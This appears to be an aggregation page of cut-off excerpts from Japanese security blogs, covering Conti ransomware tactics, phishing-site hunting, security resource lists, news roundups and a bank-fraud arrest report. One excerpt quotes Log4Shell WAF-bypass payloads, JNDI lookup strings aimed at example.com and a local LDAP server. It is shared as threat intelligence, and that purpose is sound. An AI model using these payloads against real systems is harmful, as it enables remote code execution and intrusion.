JNSA

朝日新聞で１６００枚強風で資料とばされたというニュース 資料を自宅にもっていき自宅で焼却しようとした。 そもそも資料の廃棄手順について確立されていなかったのではないか？ JNSA、紛失や置忘れで資料紛失もある ★自分の立場としては、所属の物理的な資料の処断ルールの見直しが必要かも 『その後のConti』 書記アクセスkakbot 脆弱性利用prokyshell,prokylogon log4shell,認証に対するブルートフォース 永続化にAnyDeskをインターネットからダウンロードして行う アンチウィルスを止める 侵入先のホスト ReverseSSHをする データの窃取はRclone→Me…

GitHub の Reverse Proxy 型フィッシングサイトの発見と報告 こんにちは、でじこだにょ 今回は GitHub を狙った Reverse Proxy 型のフィッシングサイトを探していこうと思います。 （長いので、Reverse Proxy 型のことをプロキシ型と略しちゃいます） 結論から書くと、２４件のフィッシングサイトを新規に発見して報告しました。 今回はそれらのフィッシングサイトの探し方のほか、フィッシングサイトの検出方法や、 セーフブラウジングなどの話をしつつ、 今回見つけたフィッシングドメインに対して、簡単ではありますが、調査と考察を行ってみたいと思います。 探そうとし…

はじめに セキュリティサービス部セキュリティエンジニアの一瀬です。今回はセキュリティエンジニアや IT に関連する組織や個人にとっても有益なリンクをご紹介します。 毎年、様々な機関がセキュリティに関連する文書を公開しています。政府機関のガイドラインや基準は、企業のセキュリティ方針を決める上で重要な指針となります。また、米国国立標準技術研究所 (NIST) が発行する文書や、セキュリティ関連組織が公開する調査報告書などは、セキュリティエンジニアだけでなく IT に関連する組織や個人にとっても有益な情報です。私もそういったリンクを参考にすることが多々あります。そこで本記事では、2021 年に、以下…

調達・製造・販売・消費などの一連の流れを意味する「サプライチェーン」。昨今、そのサプライチェーンの弱点に付け込んだサイバー攻撃が顕在化・多角化しており、企業規模を問わず「サプライチェーンセキュリティ」の対策が急務となっています。 アメリカの政府機関であるNISTは早くからサプライチェーンセキュリティを重要視しており、2017年1月にサプライチェーンリスク管理のフレームワークをまとめています。（参考）日本では、2020年11月に経済産業省や主要経済団体を中心とした「サプライチェーン・サイバーセキュリティ・コンソーシアム（Supply Chain Cybersecurity Consortium：…

【インシデント事例】 ・【独自】国際ハッカー集団、都立２病院を標的か…チャットに職員アドレス大量掲載（読売新聞オンライン） - Yahoo!ニュース 【攻撃の傾向・手法、攻撃組織の動向】 ・APT Groups Register Domain Used for C&C Long Before The Attack To Prevent Detection 【脆弱性情報】 ・「Windows Installer」に“凶悪”な脆弱性 専門家が危惧する理由は？：管理者権限を不正に取得可能 - TechTargetジャパン セキュリティ ・チェック・ポイント、最新版「グローバル脅威インデックス」を公開…

2021年の振り返り（Myself） 昨年最終日のブログ記事にて転職した旨の記事をアップ以来、1年間更新が途絶えていたわけですが（その前からも毎月更新みたいになってましたが。。）お馴染み？の1年の振り返りです。振り返るとこの1年は我が家に第二子が産まれたり仕事の面でも Job Change（転職ではないです、異動です。）があったりと 2020年 に続き激動の年でした。なぜ、またブログ記事を書き始めようかなぁと思ったキッカケですが、異動先のチームの方と 1 on 1 していた際に「テックブログが1年も更新してないなんて！」（見られてたのか！）と有難いアドバイスを頂きまして。異動先のチームが異動前…

Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF : https://t.co/f3Fi7E34TY — H4x0r-DZ (@h4x0r_dz) Dec 11, 2021 Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ??Bypass WAF 1. ${jndi:ldap://127.0.0.1:1389/ badClassName} 2. ${${::…

ドイツ全土に迫る「ブラックアウト」の危機…！今、非常事態が実際に起こっている（川口 マーン 惠美） | 現代ビジネス | 講談社（1/4）https://gendai.ismedia.jp/articles/-/90803 広告代理店に勝訴 漫画家・赤松健さん会見｜日テレNEWS24https://www.news24.jp/articles/2021/12/24/07998596.html 【セキュリティ ニュース】オンライン会議の「Zoom」、「Apache Log4j」脆弱性の影響を公表（1ページ目 / 全1ページ）：Security NEXThttps://www.security-n…

この頃、パソコンの調子がおかしい。ブログの更新もままならないかもしれない。 しかし、今回はこの話ではなく、勤務先のパソコンの話である。 Windows 10を使っているのだが、このバージョンアップがうまくいかない。専門家に調べてもらったところ、アンチウイルスソフト*1が問題だったという。ウイルスが原因で、バージョンアップがうまくいかないのかと思っていたら、アンチウイルスソフトが原因で、バージョンアップがうまくいかなかったとは…。 アンチウイルスソフトのみが原因だったかどうかはわからない。他の要因もあったのかもしれない。 ワクチンソフト https://www.jnsa.org/ikusei/0…

この記事では、動画 「エンジニアが生き残るためのテクノロジーの授業 #6：情報漏洩を防ぐために実施すべき対策とは」をまとめています。今使っているパソコンや現在のパスワード管理は安全ですか？日々巧妙化する攻撃をどう防ぐことができるのか、身の回りを再確認しながら押さえていきましょう。 はじめに情報セキュリティを考える中でも、特に情報漏洩について、どのような経路があるのか、どういった攻撃があるのか、といった視点から紹介します。 【筆者】 増井 敏克さん 増井技術士事務所代表。技術士（情報工学部門）。情報処理技術者試験にも多数合格。ビジネス数学検定1級。「ビジネス」×「数学」×「IT」を組み合わせ、コ…

ネットバンキングからの不正送金事件で”出し子”が逮捕された件が報じられていました。 www.asahi.com インターネットバンキングを通じて不正送金された預貯金を引き出したとして、警視庁はアルバイトの●●●容疑者（20）=東京都豊島区南長崎1丁目=を窃盗と電子計算機使用詐欺などの疑いで逮捕し、15日発表した。容疑を否認しているという。 同庁は●●●容疑者が不正送金グループの「出し子」で、昨年10月～今年8月に計約8500万円を引き出したとみている。 サイバー犯罪対策課によると、●●●容疑者は今年3月、ほかの人物と共謀し、東京都豊島区のコンビニのATM2カ所で、他人名義の銀行口座から計250…